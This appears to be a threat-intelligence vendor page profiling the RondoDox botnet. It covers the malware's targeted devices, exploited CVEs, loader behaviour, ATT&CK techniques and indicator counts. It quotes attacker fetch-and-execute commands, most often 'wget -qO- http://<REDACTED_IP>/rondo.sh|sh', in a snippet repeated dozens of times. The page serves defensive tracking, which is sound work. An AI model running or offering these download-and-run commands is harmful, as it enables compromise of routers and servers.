RondoDox is a Linux-based botnet malware family used primarily for distributed denial-of-service attacks. Its operators conduct opportunistic mass exploitation of internet-exposed routers, DVRs, IP cameras, NAS devices, network gateways, and enterprise servers. Campaigns target numerous command-injection and remote-code-execution vulnerabilities across embedded firmware, web applications, middleware, and infrastructure-management software, frequently affecting unsupported or end-of-life products. Documented exploitation includes vulnerabilities in TP-Link routers, ASUS routers, PHPUnit, XWiki, and Ray. Activity has expanded beyond consumer IoT devices to enterprise and AI-computing environments.
Infection typically involves a shell-based loader that identifies the host's processor architecture, downloads a compatible Linux ELF payload, and executes it. Distribution supports multiple architectures, including ARM, MIPS, and x86. Loader behavior includes terminating competing malware, removing earlier infections, attempting to disable SELinux and AppArmor, clearing shell history, and suppressing execution output. Infected systems connect to command-and-control infrastructure for operator-directed activity. Analyzed payloads include modular command dispatch, persistence mechanisms, deceptive process or service naming, and encoded or obfuscated strings.
RondoDox campaigns combine broad vulnerability scanning with rapid adoption of additional exploits. Operators rotate staging and distribution infrastructure and have used compromised residential systems to host payloads. The botnet's targeting is broad rather than confined to a single industry, with campaigns reaching government, financial, and industrial environments.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
45 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Ruijie RG-UAC Application Management Gateway contains a command injection vulnerability via the 'nmc_sync.php' interface. VulnCheck has observed this vulnerability being targeted by the RondoDox botnet campaign.
BYTEVALUE Intelligent Flow Control Router contains a command injection vulnerability via the /goform/webRead/open endpoint. The `path` parameter is not properly validated and is echoed into a shell context, allowing an attacker to inject and execute arbitrary shell commands on the device. VulnCheck has observed this vulnerability being targeted by the RondoDox botnet campaign.
Reporting links activity to React2Shell (CVE-2025-55182) exploitation against Next.js servers in December.
Reporting links activity to XWiki RCE (CVE-2025-24893) in November.
Первый зафиксированный эксплойт - CVE-2023-1389 ... (command injection в TP-Link Archer AX21, CVSS 8.8 ...). Эта CVE в CISA KEV с мая 2023 года. | «RondoDox - Mirai-производный ботнет, впервые зафиксированный Bitsight в мае 2025 года.»
Атакующий комбинирует подмену User-Agent с DNS rebinding ... Исправлена в Ray 2.52.0. ... RondoDox добавил CVE-2025-62593 ... за два дня до публичного раскрытия PoC. | «RondoDox - Mirai-производный ботнет, впервые зафиксированный Bitsight в мае 2025 года.»
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
Breadcrumbs threat_research / rondodox / cve_poc_table.md ... Latest commit ... RondoDox IoCs ... numerous CVE PoC entries fetch and execute payloads such as 'wget -qO- http://<REDACTED_IP>/rondo.sh|sh' and binaries like './rondo huawei.mips'.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Most of November’s volume tracked to a single cluster we associate with RondoDox distribution. 76% of attempts (737 out of 969) matched the same delivery pattern... with payloads that fetch and execute a first-stage script... ( wget -qO- http://74.###.###.52/rondo.ame.sh ... ) | sh"
21 distinct techniques documented for this family, organized by ATT&CK tactic.
At this point it will also set up its own persistence and drop and launch the XMRig miner
The table shows varied User-Agent strings and email-like identifiers such as "Mozilla/5.0 (bang2012@tutanota.de)", "Mozilla/5.0 (bang2012@protonmail.com)", and browser-like Chrome user agents.
It then attempts to remove other threats, both by checking specific file locations and by removing entries from the victim's crontabs.
The payloads repeatedly rely on native utilities such as "wget", "busybox wget", "curl", and shell interpreters already present on the target device.
Upon being launched, the main binary does some basic sanity checks for its name and arguments, as well as checks for anti-debug and anti-analysis.
This isn’t hypothetical — it’s the entire history of IoT botnets, from Mirai in 2016 through the Aisuru and RondoDox campaigns still running in 2025–2026, which scan the internet for devices with default passwords and enroll them automatically.
utilisés pour mener des attaques par déni de service distribué (DDoS), des opérations de minage de cryptomonnaies
«Compute Hijacking (T1496.001, Impact) ... запуск XMRig и других майнеров на GPU»
192 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
84 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mirai-derived botnet described as primarily focused on DDoS, while also deploying cryptocurrency miners and stealing credentials. The article reports 174 exploits and support for 18 processor architectures. Its infection chain downloads shell scripts directly into a shell, retrieves architecture-specific binaries, modifies crontab for persistence, and removes competing malware. It targets both IoT devices and Ray AI infrastructure.
A DDoS botnet whose operators were reported to have added exploitation of CVE-2025-62593 to their toolkit before public disclosure.
A sophisticated botnet observed targeting both enterprise and consumer systems, using staged infrastructure shifts, fileless payloads, broad header-based exploit delivery, and compromised residential routers for scanning and propagation.
IoT botnet campaign active in 2025–2026 that scans the internet for devices with default passwords and enrolls them automatically.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.